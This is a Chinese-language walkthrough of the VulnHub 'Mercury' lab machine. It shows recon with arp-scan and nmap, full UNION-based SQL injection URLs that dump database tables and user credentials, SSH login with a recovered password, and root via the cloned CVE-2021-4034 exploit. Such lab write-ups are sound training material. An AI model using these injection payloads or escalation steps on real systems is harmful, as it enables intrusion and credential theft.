Vulnhub-Mercury


Mercury靶机下载:https://www.vulnhub.com/entry/the-planets-mercury,544/

攻击机:KALI


打开虚拟机发现无法获取地址(不知道是不是普遍现象??)

重启后在开机时长按shift

选择Advanced options for Ubuntu

进入后按e

将ro quiet更改为rw signie init=/bin/bash后按ctrl+x进入系统,输入: lsb_release -a 系统发行版本

使用vi /etc/netplan/00-installer-config.yaml看到网卡名有问题并修改

重启后正常


信息搜集

在KALI中使用ARP-SCAN确认靶机IP

arp-scan -l

使用NMAP扫描端口

nmap -A -p 1-65535 192.168.122.136

发现只有22和8080端口

尝试构造错误,查看是否有debug

发现三个页面,尝试打开前两个,都没什么有价值的内容 访问http://192.168.122.136:8080/mercuryfacts/显示如下页面


漏洞攻击

点击Load a fact发现疑似SQL注入点

尝试查询数据库名

 

利用数据库名查表名

http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='mercury'/

利用表名查询字段

http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'/

利用字段名查具体数据,得到几组用户名密码

http://192.168.122.136:8080/mercuryfacts/-1%20union%20select%20group_concat(username,0x2d,password)%20from%20users/

  尝试SSH登录,最后使用webmaster-mercuryisthesizeof0.056Earths连上了

ll发现目录下的flag

查看其他文件,在mercury_proj/notes.txt下发现一个用户名和base64加密的密码

解密后得到mercurymeandiameteris4880km

切换成功


提权

查找有权限的命令
find / -perm -u=s -type f 2>/dev/null
经搜索发现最下面一个存在CVE-2021-4034提权漏洞
使用git clone https://github.com/berdav/CVE-2021-4034
执行make命令后生产cve-2021-4034*

直接执行后提权成功 使用find命令查找flag后打开
find / -name "*flag*"